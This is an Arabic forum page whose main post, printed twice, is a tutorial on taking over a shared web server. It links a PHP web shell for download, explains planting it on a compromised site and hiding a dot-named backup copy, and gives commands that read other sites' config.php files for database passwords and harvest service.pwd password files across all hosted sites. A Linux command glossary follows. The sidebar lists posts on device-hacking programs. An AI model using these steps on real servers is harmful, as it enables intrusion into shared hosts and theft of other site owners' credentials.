دخول
عروبتنا هل ترى تنكرين ؟
عروبتنا هل ترى تنكرين ؟
منحناكى كل الذى تطلبين
سكبنا الدماء على راحتيكى
لنحمى العرين فلا يستكين
وهبناكى كل رحيق الحياه
فلم نبق شئاً فهل تذكرين؟
فيا مصر صبراً على مارأيت
جفاء الرفاق لشعب آمين
سيبقى نشيدك رغم الجراح
يضئ الطريق على الحائرين
سيبقى عبيرك بيت الغريب
وسف الضعيف وحلم الحزين
سيبقى شبابك رغم الليالى
ضياء يشع على العالمين
فهيا اخلعى عنكى ثوب الهموم
غداً سوف يأتى بما تحلمين
بحـث
المواضيع الأخيرة
» تعريف كاميرا النت تايجر 120من طرف محمد ريحان السبت 19 ديسمبر 2015, 01:22
» برنامج استرجاع الملفات المحذوفة عربي ومجاني
من طرف حسين الإثنين 31 أغسطس 2015, 13:53
» برنامج اختراق اجهزة بدون فتح بورت
من طرف زائر الأحد 24 مايو 2015, 01:06
» برنامج برمودا 1.51 لاختراق الاجهزة والشرح بالصور
من طرف زائر الثلاثاء 12 مايو 2015, 14:59
» أوباما" يطالب "السيسى" تسليمه وثيقة إتفاقية بيع سيناء للإعتراف بعزل "مرسى"
من طرف السبت 06 يوليو 2013, 16:44
» تعذيب حمادة ابوشيتة من اسباب خطف الجنود المصريين
من طرف الخميس 16 مايو 2013, 15:46
» الجيش يجهز لعملية عسكرية للرد على اختطاف الجنود في سيناء
من طرف الخميس 16 مايو 2013, 15:34
» اعطال الشحن
من طرف الأحد 05 مايو 2013, 15:02
» استخراج اى مقطع صوتى من الفيديو بدون برامج
من طرف الجمعة 26 أبريل 2013, 10:10
» اختراق الأجهزة مع برنامج AsbMay (ممتاز)عربي + شرح بالصور
من طرف خالد محمد الأربعاء 27 فبراير 2013, 02:10
المواضيع الأكثر نشاطاً
التبادل الاعلانى المجانى
تسجيل صفحاتك المفضلة في مواقع خارجية
قم بحفض و مشاطرة الرابط منتدى البرامج على موقع حفض الصفحات
قم بحفض و مشاطرة الرابط منتدى التنين المصرى على موقع حفض الصفحات
مصر ام الدنيا
المتواجدون الآن ؟
ككل هناك 1 عُضو حالياً في هذا المنتدى :: 0 عضو مُسجل, 0 عُضو مُختفي و 1 زائر :: 1 روبوت الفهرسة في محركات البحثلا أحد
أكبر عدد للأعضاء المتواجدين في هذا المنتدى في نفس الوقت كان 41 بتاريخ الخميس 03 أغسطس 2017, 06:42
شرح لاختراق المواقع من الصفر الى الاحتراف
صفحة 1 من اصل 1
شرح لاختراق المواقع من الصفر الى الاحتراف
شرح لاختراق المواقع من الصفر الى الاحتراف
مرحبا شرح Zero-cool2
الدرس الاول
طريقه اختراق السيرفر كاملا
للكاتب : دكتور الحب
===========================
هذا الجزء من المحتوى مخفيطريقة اختراق السيرفرات ..
نفترض انك اخترقت موقع باي ثغره.. او عندك انت موقع لك عند اي سيرفر..
وتبي تخترق السيرفر.. فهذي بسيطه جدا جدا
قم بتحميل سكربت الشيل بلغة php على جهازك
وهذي وصلة الشيل.. (( متطور )) [IMG]http://www.alkaen.taqaniat.net/ShellsAlkaeN.zip[/url]
------------------------------------------------------------------------------
بسم الله نبدأ في الشرح ::--
البي اتش بي شيل ((phpshell )) هو سكربت بلغة (( php ))
وتستطيع من خلاله تنفيذ اوامر اللينكس.. مثلا احضار باسوردات الـ مواقع التي على السيرفر وايضا قرائة الملف الــ config
للتي على السيرفر..
ولاكن لتنفيذ الاوامر هذه يجب عليك ان تقوم بتحميل الــ phpshell
على موقعك او الموقع الذي اخترقته..
ومن بعد التحميل سوف تستطيع ان تخترق السيرفر كاملا ..
وللتوضيح اكثر..
نفترض انك اخترقت الموقع www.USA.com وقمت بتحميل الــ phpshell
على ملف download
فسيصبح العنوان www.USA.com/download/phpshell.php
وثم اذا دخلنا الى العنوان سوف نجد كلمة اسمها Command وامامها فراغ
في الفراغ هذا سوف نضع فيه اوامر اللينكس..
ولاكن قبل البدء في الشرح الجدي.. احب اوضح نقطه مهمه ::--
يمكن لو شاف صاحب الموقع الشيل.. يروح ويحذفه لك وثم تتورط..
ولاكن لو نسوي اثنين واحد منهم مخفي.. يعني الاول اذا حذفه راح يكون معانا واحد مخفي :alam 2:
لاخفاءه نسوي كذا بالطريقة هذي www.USA.com/phpshell.php wget
وثم نقوم باخفائه.. نقوم بتغيير اسمه الى Mv phpshell.php .phpshell.php
ماذا تلاحظ ؟ لقط اضفنا نقطة . واذا حذف الاول راح يكون معانا ثاني ومخفي بعد..
---------------------------------------------
ندخل الى موضوعنا
والان بعد تحميل الشيل على الموقع
يصبح العنوان مثلا www.USA.com/download/phpshell.php
وثم نجد كتابة اسمها Command وامامها فراغ
في الفراغ هذا ندخل اوامر اللينكس عليه..
وندخل الامر هذا مثلا ls /var/named
وهو لاحضار جميع المواقع التي على السيرفر..
ولاكن قبل البدء بالاوامر.. قد تستطيع ان تخترق السيرفر كاملا اذا لم يكن عليه الــ سيف مود
((safe mode))
=============---== --شرحالاوامر--==--==============
الان سوف اعلمك طريقة سحب : قواعد البيانات - المواقع - الباسوردات
نبدأ من الاسهل حتى الاصعب.. (( كلها سهله لاكن بالباسوردات ))
1- قواعد البيانات
اكتب هذا الامر امام النص Command في الفراغ المقابل له
اكتب هذا الامر
find / -name config.php
الحين راح يطلع لك كل ملفات الكونفيج الي على السيرفر بالشكل هذا :
usr/local/plesk/apache/vhosts/acinovara.com/httpdocs/forum/config.php
usr/local/plesk/apache/vhosts/adamparker.com/httpdocs/blacktalons/admin/config.php
usr/local/plesk/apache/vhosts/ainvar.net/httpdocs/phpBB/config.php
usr/local/plesk/apache/vhosts/aipep.com/httpdocs/bbs/config.php
(( المواقع التي على السيرفر قليله جدا جدا وعدد المواقع يكون على حسب عدد المواقع التي على السيرفر.. وانا عادة يخرج لي 300 موقع ))
ونلاحظ ان التي باللون الزهري هي الموقع..
طيب نبي نقرأ الي متكوب داخل الملف هذا
usr/local/plesk/apache/vhosts/ainvar.net/httpdocs/phpBB/config.php
ونلاحظ ان الموقع هو www.ainvar.net والمنتدى من نوعية phpBB
المهم نبي نقرأ الي بداخله.. نكتب الامر هذا
cat /usr/local/plesk/apache/vhosts/ainvar.net/httpdocs/phpBB/config.php
وثم راح يطلع لك ملف الــ config.php
وبداخله يوجد اليوزر نيم والباسورد لقاعدة البيانات
روح طير للمنتدي وثم لملف الــ admin ودخل اليوزر نيم والباسورد لقاعدة البيانات
او الدخول له عبر برنامج الــ MySQL-Front_2.5_Setup
-------------------------------------------------------
الان انتهينا من قاعدة البيانات باقي باسوردات المواقع..
اكتب امام Command في الفراغ نكتب هذا الامر
find / -name service.pwd
وراح يطلع لنا المواقع بالشكل ذا :
usr/local/plesk/apache/vhosts/acinovara.com/httpdocs/_vti_pvt/service.pwd
usr/local/plesk/apache/vhosts/adamparker.com/httpdocs/_vti_pvt/service.pwd
usr/local/plesk/apache/vhosts/ainvar.net/httpdocs/_vti_pvt/service.pwd
usr/local/plesk/apache/vhosts/aipep.com/httpdocs/_vti_pvt/service.pwd
التي باللون الزهري هي المواقع...
طيب الان ابي استعرض الباسورد للموقع
usr/local/plesk/apache/vhosts/ainvar.net/httpdocs/_vti_pvt/service.pwd
راح نكتب الامر هذا
cat /usr/local/plesk/apache/vhosts/ainvar.net/httpdocs/_vti_pvt/service.pwd
وراح يجينا الباسورد للموقع ومشفر بمقياس DES
----------------------------------------------------------
طيب يوجد طريقة اخرى افضل من ذلك
نكتب الامر هذا
cat /home/*/public_html/_vti_pvt/service.pwd
او
cat /home/*/public_html/_vti_pvt/access.cnf
وراح يجينا الباسوردات لكل المواقع..
ويوجد اوامر اخرى كثيره للينكس.. ابحث عنها في المنتديات الاخرى وسوف تجدها ..
او قول لي وانا اعطيك افضلها واغلبها..
وهذه ايضا اوامر مبسطة للافادة : : - -
+++++++++++++++++++++++++++++++++
A
access : لفحص ملف من حيث امكانيه القراءة , الكتابة ..
at : لتنفيذ امر في تاريخ ووقت معين
alarm : لعمل منبه
accept : لقبول اتصال على سوكيت .
B
batch : لتنفيذ امر عندما يحصل على تصريح
buildhash : مدقق املائي
C
cat : لعرض محتوى اكثر من ملف مع بعض
cd : لتغير الدليل الذي انت عليه
chmod : لتغير تصريح دخلول ملف معين
chown : لتغير مالك ملف معين
clear : لمسح كل الذي على الشاشة
cmp : لمقارنة ملفين
cp : لنسخ الملفات
crypt : لتشفير و فك تشفير الملفات
csplit : لتقسيم الملف الى عدة ملفات
cu : لطلب تريمنال يونكس اخر
D
date : لاظهار التاريخ و الساعة
df : لتقديم تقرير عن مساحه القرص ( المساحه الخالية .. )
diff : لمقارنه ملفين
diff3 : لمقارنه 3 ملفات او اكثر
dircmp : لمقارنه دليلان
du : تقرير عن مساحه القرض المستخدم
E
echo : يستخدم لاظهار سطر نكتب فيه تيكست
text editor : ed ( مثل الورد يعني )
egrep : مثل الامر grep
text editor : ex ( مثل الورد يعني )
F
file : للتقرير عن نوع ملف
find : للبحث عن ملفات
finger : تقرير عن مستخدم
G
++g : كومبيلر لل C++ و C
gcc : كومبيلر لل C++ و C
grep : يستخدم للبحث عن شئ داخل ملف
gzip : لضغط ملفات
gunzip : لضغط ملفات
H
haltsys : لاغلاق النظام
head : لاظهار اول 10 اسطر من الملف
I
ispell : مدقق املائي
K
** kill : لانهاء عمليه
L
line : لقراءة ملف سطر معين في ملف
ln : لعمل لينك ملف معين
logname : للحصول على اسم الدخول الخاص بك
lpr : ارسال طلب للطباعه
lprint : للطباعه بالطابعه المحليه
lpstat : لتقديم تقرير عن حاله الطباعه
lpq : لتقديم تقرير عن حاله الطباعه
ls : لعرض محتويات مجلد
M
mail : لارسال و استقبال ايميلات
man : للحصول على معلومات عن اي امر
mkdir : لعمل دليل جديد
more : لعرض الملفات
P
passwd : لانشاء كملة سر او تغيره
pr : لطباعه ملف
ps : العمليات عن العمليات التي تم تشغيلها
pstat : لعرض حالة النظام
pwd : لعرض المسار الذي انت فيه الان
R
rm : لمسح ملفات او مجلدات ( خاليه )
rmdir : لمسح مجلد ( خالي )
+++++++++++++++++++++++++++++++++++
جميع الحقوق محفوضه للكاتب دكتور الحب
مرحبا شرح Zero-cool2
الدرس الاول
طريقه اختراق السيرفر كاملا
للكاتب : دكتور الحب
===========================
هذا الجزء من المحتوى مخفيطريقة اختراق السيرفرات ..
نفترض انك اخترقت موقع باي ثغره.. او عندك انت موقع لك عند اي سيرفر..
وتبي تخترق السيرفر.. فهذي بسيطه جدا جدا
قم بتحميل سكربت الشيل بلغة php على جهازك
وهذي وصلة الشيل.. (( متطور )) [IMG]http://www.alkaen.taqaniat.net/ShellsAlkaeN.zip[/url]
------------------------------------------------------------------------------
بسم الله نبدأ في الشرح ::--
البي اتش بي شيل ((phpshell )) هو سكربت بلغة (( php ))
وتستطيع من خلاله تنفيذ اوامر اللينكس.. مثلا احضار باسوردات الـ مواقع التي على السيرفر وايضا قرائة الملف الــ config
للتي على السيرفر..
ولاكن لتنفيذ الاوامر هذه يجب عليك ان تقوم بتحميل الــ phpshell
على موقعك او الموقع الذي اخترقته..
ومن بعد التحميل سوف تستطيع ان تخترق السيرفر كاملا ..
وللتوضيح اكثر..
نفترض انك اخترقت الموقع www.USA.com وقمت بتحميل الــ phpshell
على ملف download
فسيصبح العنوان www.USA.com/download/phpshell.php
وثم اذا دخلنا الى العنوان سوف نجد كلمة اسمها Command وامامها فراغ
في الفراغ هذا سوف نضع فيه اوامر اللينكس..
ولاكن قبل البدء في الشرح الجدي.. احب اوضح نقطه مهمه ::--
يمكن لو شاف صاحب الموقع الشيل.. يروح ويحذفه لك وثم تتورط..
ولاكن لو نسوي اثنين واحد منهم مخفي.. يعني الاول اذا حذفه راح يكون معانا واحد مخفي :alam 2:
لاخفاءه نسوي كذا بالطريقة هذي www.USA.com/phpshell.php wget
وثم نقوم باخفائه.. نقوم بتغيير اسمه الى Mv phpshell.php .phpshell.php
ماذا تلاحظ ؟ لقط اضفنا نقطة . واذا حذف الاول راح يكون معانا ثاني ومخفي بعد..
---------------------------------------------
ندخل الى موضوعنا
والان بعد تحميل الشيل على الموقع
يصبح العنوان مثلا www.USA.com/download/phpshell.php
وثم نجد كتابة اسمها Command وامامها فراغ
في الفراغ هذا ندخل اوامر اللينكس عليه..
وندخل الامر هذا مثلا ls /var/named
وهو لاحضار جميع المواقع التي على السيرفر..
ولاكن قبل البدء بالاوامر.. قد تستطيع ان تخترق السيرفر كاملا اذا لم يكن عليه الــ سيف مود
((safe mode))
=============---== --شرحالاوامر--==--==============
الان سوف اعلمك طريقة سحب : قواعد البيانات - المواقع - الباسوردات
نبدأ من الاسهل حتى الاصعب.. (( كلها سهله لاكن بالباسوردات ))
1- قواعد البيانات
اكتب هذا الامر امام النص Command في الفراغ المقابل له
اكتب هذا الامر
find / -name config.php
الحين راح يطلع لك كل ملفات الكونفيج الي على السيرفر بالشكل هذا :
usr/local/plesk/apache/vhosts/acinovara.com/httpdocs/forum/config.php
usr/local/plesk/apache/vhosts/adamparker.com/httpdocs/blacktalons/admin/config.php
usr/local/plesk/apache/vhosts/ainvar.net/httpdocs/phpBB/config.php
usr/local/plesk/apache/vhosts/aipep.com/httpdocs/bbs/config.php
(( المواقع التي على السيرفر قليله جدا جدا وعدد المواقع يكون على حسب عدد المواقع التي على السيرفر.. وانا عادة يخرج لي 300 موقع ))
ونلاحظ ان التي باللون الزهري هي الموقع..
طيب نبي نقرأ الي متكوب داخل الملف هذا
usr/local/plesk/apache/vhosts/ainvar.net/httpdocs/phpBB/config.php
ونلاحظ ان الموقع هو www.ainvar.net والمنتدى من نوعية phpBB
المهم نبي نقرأ الي بداخله.. نكتب الامر هذا
cat /usr/local/plesk/apache/vhosts/ainvar.net/httpdocs/phpBB/config.php
وثم راح يطلع لك ملف الــ config.php
وبداخله يوجد اليوزر نيم والباسورد لقاعدة البيانات
روح طير للمنتدي وثم لملف الــ admin ودخل اليوزر نيم والباسورد لقاعدة البيانات
او الدخول له عبر برنامج الــ MySQL-Front_2.5_Setup
-------------------------------------------------------
الان انتهينا من قاعدة البيانات باقي باسوردات المواقع..
اكتب امام Command في الفراغ نكتب هذا الامر
find / -name service.pwd
وراح يطلع لنا المواقع بالشكل ذا :
usr/local/plesk/apache/vhosts/acinovara.com/httpdocs/_vti_pvt/service.pwd
usr/local/plesk/apache/vhosts/adamparker.com/httpdocs/_vti_pvt/service.pwd
usr/local/plesk/apache/vhosts/ainvar.net/httpdocs/_vti_pvt/service.pwd
usr/local/plesk/apache/vhosts/aipep.com/httpdocs/_vti_pvt/service.pwd
التي باللون الزهري هي المواقع...
طيب الان ابي استعرض الباسورد للموقع
usr/local/plesk/apache/vhosts/ainvar.net/httpdocs/_vti_pvt/service.pwd
راح نكتب الامر هذا
cat /usr/local/plesk/apache/vhosts/ainvar.net/httpdocs/_vti_pvt/service.pwd
وراح يجينا الباسورد للموقع ومشفر بمقياس DES
----------------------------------------------------------
طيب يوجد طريقة اخرى افضل من ذلك
نكتب الامر هذا
cat /home/*/public_html/_vti_pvt/service.pwd
او
cat /home/*/public_html/_vti_pvt/access.cnf
وراح يجينا الباسوردات لكل المواقع..
ويوجد اوامر اخرى كثيره للينكس.. ابحث عنها في المنتديات الاخرى وسوف تجدها ..
او قول لي وانا اعطيك افضلها واغلبها..
وهذه ايضا اوامر مبسطة للافادة : : - -
+++++++++++++++++++++++++++++++++
A
access : لفحص ملف من حيث امكانيه القراءة , الكتابة ..
at : لتنفيذ امر في تاريخ ووقت معين
alarm : لعمل منبه
accept : لقبول اتصال على سوكيت .
B
batch : لتنفيذ امر عندما يحصل على تصريح
buildhash : مدقق املائي
C
cat : لعرض محتوى اكثر من ملف مع بعض
cd : لتغير الدليل الذي انت عليه
chmod : لتغير تصريح دخلول ملف معين
chown : لتغير مالك ملف معين
clear : لمسح كل الذي على الشاشة
cmp : لمقارنة ملفين
cp : لنسخ الملفات
crypt : لتشفير و فك تشفير الملفات
csplit : لتقسيم الملف الى عدة ملفات
cu : لطلب تريمنال يونكس اخر
D
date : لاظهار التاريخ و الساعة
df : لتقديم تقرير عن مساحه القرص ( المساحه الخالية .. )
diff : لمقارنه ملفين
diff3 : لمقارنه 3 ملفات او اكثر
dircmp : لمقارنه دليلان
du : تقرير عن مساحه القرض المستخدم
E
echo : يستخدم لاظهار سطر نكتب فيه تيكست
text editor : ed ( مثل الورد يعني )
egrep : مثل الامر grep
text editor : ex ( مثل الورد يعني )
F
file : للتقرير عن نوع ملف
find : للبحث عن ملفات
finger : تقرير عن مستخدم
G
++g : كومبيلر لل C++ و C
gcc : كومبيلر لل C++ و C
grep : يستخدم للبحث عن شئ داخل ملف
gzip : لضغط ملفات
gunzip : لضغط ملفات
H
haltsys : لاغلاق النظام
head : لاظهار اول 10 اسطر من الملف
I
ispell : مدقق املائي
K
** kill : لانهاء عمليه
L
line : لقراءة ملف سطر معين في ملف
ln : لعمل لينك ملف معين
logname : للحصول على اسم الدخول الخاص بك
lpr : ارسال طلب للطباعه
lprint : للطباعه بالطابعه المحليه
lpstat : لتقديم تقرير عن حاله الطباعه
lpq : لتقديم تقرير عن حاله الطباعه
ls : لعرض محتويات مجلد
M
mail : لارسال و استقبال ايميلات
man : للحصول على معلومات عن اي امر
mkdir : لعمل دليل جديد
more : لعرض الملفات
P
passwd : لانشاء كملة سر او تغيره
pr : لطباعه ملف
ps : العمليات عن العمليات التي تم تشغيلها
pstat : لعرض حالة النظام
pwd : لعرض المسار الذي انت فيه الان
R
rm : لمسح ملفات او مجلدات ( خاليه )
rmdir : لمسح مجلد ( خالي )
+++++++++++++++++++++++++++++++++++
جميع الحقوق محفوضه للكاتب دكتور الحب
- تاريخ التسجيل : 01/01/1970
مواضيع مماثلة
» دورة اختراق المواقع بالفيديو من الصفر حتى الاحتراف (منقول)
» كيفية فورمات كمبيوتر بالصور كتاب جديد لتعليم فورمات الحاسب من الصفر وحتى الاحتراف
» هكر .. دروس بالفيديو من الصفر للأحتراَف
» اول درس في اختراق المواقع
» برنامج السب سفن المعرّب لاختراق الاجهزةبالشرح المصور
» كيفية فورمات كمبيوتر بالصور كتاب جديد لتعليم فورمات الحاسب من الصفر وحتى الاحتراف
» هكر .. دروس بالفيديو من الصفر للأحتراَف
» اول درس في اختراق المواقع
» برنامج السب سفن المعرّب لاختراق الاجهزةبالشرح المصور
صفحة 1 من اصل 1
صلاحيات هذا المنتدى:
لاتستطيع الرد على المواضيع في هذا المنتدى